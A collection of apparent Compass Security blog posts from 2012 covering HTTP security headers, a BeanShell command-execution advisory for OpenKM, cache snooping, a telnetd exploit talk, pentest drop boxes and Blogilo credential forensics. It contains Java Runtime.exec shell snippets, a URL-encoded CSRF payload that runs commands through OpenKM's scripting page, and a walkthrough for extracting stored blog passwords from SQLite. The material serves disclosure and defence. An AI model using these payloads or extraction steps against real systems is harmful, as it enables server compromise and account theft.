New Security Enhancing HTTP Headers

In the past few years, several new HTTP Headers have been proposed to increase the security of web applications. This is being done by providing additional instructions and information about the served application to the browser. Those can mitigate and avert various common web attacks, even if the underlying application contains vulnerabilities, therefore adding another layer of defense.
As time passes, more and more people do use a browser which support those measures. Compass Security has long been testing for these security enhancing features, and is actively advocate their implementation. Therefore we release an presentation which we used to educate employees and customers alike about this topic.

 

The presentation “New HTTP headers – and living in a POST-XSS world” aims to give quick overview, and answers to all of the questions below:
  • What are the new HTTP headers you can use to protect your web application?
  • Why should I force mode=block for the X-XSS-Protection header?
  • How tightly can I configure a X-Content-Security-Policy?
  • What is the purpose of the Strict-Transport-Security header?
  • How does Stefano Di Paola’s Firefox SeecurityHeaders extension look like?
  • Let’s dream of a world where browsers are smart enough to prevent execution of arbitrary JavaScript code via XSS – what options would be left?

ISSS St.Galler Tagung 2012 – iPhone (In)Security in an Enterprise env

Ivan Bütler, CEO of Compass Security and board member of ISSS is proud to announce the third ISSS St.Galler Tagung next March 28, 2012 in Saint Gall.

Don’t miss this event, where we dig into iPhone security. First, Riccardo Trombini will introduce the threats; a MobileIron and Goods Technology expert answers with the appropriate remedy. Finally we will discuss it in the podium discussion!

The event is recommended for all people currently evaluating an MDM (mobile device management) solution and become familiar with the pros and cons of Good and MobileIron.

Checkout the ISSS flyer for more information or register directly on the website.

ISSS website and event details.

Have a save day
Ivan Bütler
E1

BeanShell puts Java Application Servers at Risk

Developers increasingly integrate BeanShell support into web applications to provide end users and administrators with a simple extension framework. But be warned! BeanShell support without appropriate access control will put the hosting web server at severe risk. An attacker could easily execute operating system calls and without appropriate system hardening such an attack will immediately result in full system compromise.

The BeanShell[1] is an environment that provides execution of Java code snippets in the web application context. The shell supports full Java language syntax and some loose structures for convenience. Be aware, to run code within an Java Virtual Machine (JVM) means to run code on the server. The following screenshot shows BeanShell enabled web application that just run a hello world command.

However, to be able to do some meaningful attacks one must first overcome and understand some limitations of the Java Runtime.getRuntime().exec() method. Simply putting a whole command into the exec method will not run properly since Java will internally tokenize the String and redirect IO streams. The first argument will be taken as executable. All remaining tokens will be passed as parameters to the executable. Thus, the below statement will not work as intended because the “-c” parameter awaits a single argument.

Runtime.getRuntime().exec("/bin/sh -c /bin/echo pwned > /tmp/poc"};

Following that, command injection in Java is a difficult thing to do since the attacker mostly just gains control over the parameters. However, in BeanShell we are pretty free to choose from the whole arsenal of Java API classes and methods. Finally, a correct call would look like:

String[] cmd = {"/bin/sh", "-c", "/bin/echo pwned > /tmp/poc"};
Runtime.getRuntime().exec(cmd);

That way, Java will pass “/bin/echo pwned > /tmp/poc” correctly. Unfortunately, there is another limitation on the IO streams. Thus, to read and process the output of a command the InputStream classes will be needed. The following snippet is a working example with the Unix list directory (ls) command.

import java.io.*;
try {
Process ls_proc = Runtime.getRuntime().exec("/bin/ls -lah");
DataInputStream ls_in = new DataInputStream(ls_proc.getInputStream());
String ls_str;
while ((ls_str = ls_in.readLine()) != null)
print(ls_str + " ");
} catch (IOException e) {
}

So, you might be asking yourself how this ex-course on the Runtime class’s exec method is related to BeanShell support in web applications?

I have published an advisory[3] on insufficient access control of an integrated BeanShell in an Enterprise Java (J2EE) based document management system software (OpenKM). An attacker could prepare en evil e-mail or website that runs a malicious command on the server if the OpenKM administrator clicks on the link or visits the prepared website.

For example, an attacker would simply embed the below JavaScript exploit code into a web page to cause writing a proof of concept file into the /tmp folder.

img = new Image();
img.src="http://example.com/OpenKM/admin/scripting.jsp?script=String%5B%5D+cmd+%3D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3E+%2Ftmp%2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B"

Related vulnerabilities are often seen in administrative interfaces of web apps. The attack scheme is also known as Cross-site Request Forgery or XSRF[4]. There are several ways to approach the issue. Either ensure proper access controls[5] or lock down the JVM using Java security policies and the Security Manager[6]. In the end, system hardening may help limiting collateral damage in case of successful attacks.

References
[1] http://www.beanshell.org/
[2] http://www.ensta-paristech.fr/~diam/java/online/io/javazine.html
[3] http://www.csnc.ch/misc/files/advisories/COMPASS-2012-002_openkm_xsrf_os_command_execution.txt
[4] https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
[5] https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet
[6] http://docs.oracle.com/javase/7/docs/api/java/lang/RuntimePermission.html

Retrospective about cache snooping

As it is known since at least 2006, a website is able to identify the domains a user previously visited, with some simple CSS hacks. This had great privacy implications, and browsers took steps to eliminate this problem. But in December 2011, lcamtuf presented a new proof of concept based on cache timings, which basically does the same thing. This new technique uses JavaScript and the caching behavior of previously loaded resources to identify visited domains.

This vulnerability is not something a penetration test will identify, as it is purely a client side problem. Nevertheless it is a interesting topic as it exposes fundamental flaws in browser technology concerning privacy and which can’t be patched easily. It is similar to side-channel attacks in crypto systems, and the fix inherently reduces performance.

The attached presentation “CSS -visited – or now Browser Cache Timing” gives an overview of the history around this issue and how the proof of concept of 2006, respectively December 2011 work.

Research über die Netkit-Telnetd Schwachstelle

Als ich nach den üblichen Weihnachtsfesten auf Twitter die neusten Sicherheitsmeldungen überflog, bin ich auf einen interessanten Blog Eintrag gestossen:
A Textbook Buffer Overflow: A Look at the FreeBSD telnetd Code.
Der Author beschreibt eine Buffer Overflow Lücke im Netkit Telnet Daemon, der im FreeBSD Betriebssystem verwendet wird. Die Schwachstelle wurde Zwei Tage vorher, am 23.12.2011 veröffentlicht. Details dazu gibt es in CVE-2011-4862. Um die Schwachstelle auszuführen ist kein Benutzeraccount nötig, sie ist einfach auszunützen und ergibt bei einem erfolgreichen Exploit sofort Root Zugang. Zusätzlich verwendet FreeBSD keine der Standard Schutzmechanismen wie ASLR und DEP.

All diese Tatsachen verführten mich dazu, mehr Zeit in dieses Thema zu investieren. Zwei Tage später hatte ich einen funktionsfähigen Exploit für das Metasploit Framework entwickelt. Die Erfahrungen die ich dabei machte habe ich in einer Präsentation zusammengefasst, die ich dann meinen Compass Arbeitskollegen vorgetragen habe. Darin enthalten ist die Analyse des Fehlerhaften Codes, worauf eine kurze Abhandlung des Telnet Protokolls folgt. Mit diesem Vorwissen bewaffnet werden die einzelnen Stufen des Exploits detailliert erklärt, mit Veranschaulichung durch Aufnahmen des Netzwerkverkehrs, grafische Darstellung von Datenstrukturen im Telnet Deamon und Details aus dem Metasploit Modul. Abschliessend sind noch typische Anti-Exploiting Mechanismen vorgestellt, und wie es möglich ist diese zu umgehen.

Die Präsentation kann unter diesem Link heruntergeladen werden:

Simulated Industrial Espionage with the Pwnie Express Device

The Pwnie Express is a device that is designed for remote security testing of corporate and federal facilities and can be used as an “All-In-One” hacking drop box, aiding the pentesters at Compass Security, to conduct “real world” industrial espionage simulations.

null
http://pwnieexpress.com/

The typical penetration testing scenario is:
1) A Compass analyst manages to “social-engineer” his way into the premises of the customer, who ordered the penetration test.
2) As soon as the analyst finds an unprotected network plug, printer, WiFi network or unprotected computer, he connects the Pwnie Express device to it.
3) The preconfigured Pwn Plug uses extremely aggressive reverse tunneling mechanisms to establish a reverse connection (SSH, SSL, HTTP, ICMP, DNS, 3G) back to the compass C&C (command and control) server.
4) From this server the analyst at Compass is able to penetrate the internal network of the customer, as if he is on site.

All in all a very useful little tool that shows possible impacts of missing user awareness or inadequately secured premises to our customers.

Blogilo Forensics

The analysis of Social Media apps gets more and more weight as these applications gain momentum with end users. Thus, forensic analysts must not only understand how to grab files and content from a suspects computer but also from its online services (not to use the damn Cloud word). Therefore, it is crucial to understand the full functionality of online Social Media applications since not only publicly published contents but also hidden and drafted files may be of interest to investigatory entities.

In the end, investigators would need to understand how to recover passwords from supporting desktop software such as blog client programs. This article should point out on how to recover user accounts and passwords from the well used Blogilo KDE (Linux) blog client software.

All KDE applications configuration files are stored within the user home ~/.kde/share/apps folder. Blogilo does store its configuration within that path as well.

cbrunsch@tubarao:~$ ls -laR .kde/share/apps/blogilo/
.kde/share/apps/blogilo/:
total 92
drwx------  4 cbrunsch cbrunsch  4096 2012-01-06 08:21 .
drwx------ 11 cbrunsch cbrunsch  4096 2011-12-29 16:10 ..
drwx------  2 cbrunsch cbrunsch  4096 2012-01-02 23:03 1
drwx------  2 cbrunsch cbrunsch  4096 2011-12-28 17:10 -1
-rw-r--r--  1 cbrunsch cbrunsch 62464 2012-01-06 08:21 blogilo.db

.kde/share/apps/blogilo/1:
total 48
drwx------ 2 cbrunsch cbrunsch  4096 2012-01-02 23:03 .
drwx------ 4 cbrunsch cbrunsch  4096 2012-01-06 08:21 ..
-rw-rw-r-- 1 cbrunsch cbrunsch 29586 2012-01-02 23:03 style.html

.kde/share/apps/blogilo/-1:
total 8
drwx------ 2 cbrunsch cbrunsch 4096 2011-12-28 17:10 .
drwx------ 4 cbrunsch cbrunsch 4096 2012-01-06 08:21 ..

Actually, the file of interest is the blogilo.db file. Let’s see whether we can read the accounts directly from that file.

We could try to guess from the output what the username and password might be. However, there is also some more binary content. Thus, let’s have a closer look.

cbrunsch@tubarao:~/.kde/share/apps/blogilo$ file blogilo.db
blogilo.db: SQLite 3.x database

The file command reports an SQLite database. To store the configuration of applications within the file based SQLite format is becoming very popular. Also Firefox does store passwords and history information within databases of the SQLite format. Luckily, these files could be queried very conveniently using an SQLite client. The schema information of that specific Blogilo database can be queried from the sqlite_master table contained within the same file. The schema does also contain information on existing tables.

cbrunsch@tubarao:~/.kde/share/apps/blogilo$ sqlite3 blogilo.db
SQLite version 3.7.9 2011-11-01 00:52:41
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> select name from sqlite_master where type="table";
blog
post
comment
category
file
post_cat
post_file
local_post
local_post_cat
temp_post
temp_post_cat
sqlite> select * from blog;
1|30925834|https://cybrs.wordpress.com/xmlrpc.php|cybrs123|Ult1mate.PW!|http://cybrs.wordpress.com/|3|CYBR's Blog|0||
sqlite>

Here we go. For each configured blog, there will be an entry within the blog table. Each of the records will contain the XML-RPC interface URL as well as the username and password of the blog account. That logon information will also grant access on the online service and would allow to seize hidden and drafted evidence.

NOTE: You must install the SQLite version 3.x client otherwise you won’t be able to query the file.

Tech-Talk am Watchguard Event

Manfred Huber ist beim Sicherheitsspezialisten WatchGuard Technologies als Territory-Sales-Manager neu unter anderem zuständig für die Betreuung und den Ausbau des Schweizer Partnernetzwerks.

http://www.it-markt.ch/News/2012/01/03/Watchguard-mit-neuem-Territory-Sales-Manager.aspx

Erste Partnerkonferenz

Den ersten öffentlichen Auftritt in seiner neuen Funktion dürfte Huber im Rahmen der erstmalig stattfindenden WatchGuard-Partnerkonferenz in der Schweiz haben. Am 17. Januar lädt der Sicherheitsspezialist zu selbiger im Hotel Uto Kulm auf dem Üetliberg in Zürich. Der Partnertag gliedere sich in drei Teile mit Produktpräsentationen, einem Gastreferat von Compass Security CEO Ivan Bütler zum Thema Internetkriminalität und technische Sessions am Nachmittag, meldet WatchGuard.

9.1.2012 by Ivan Bütler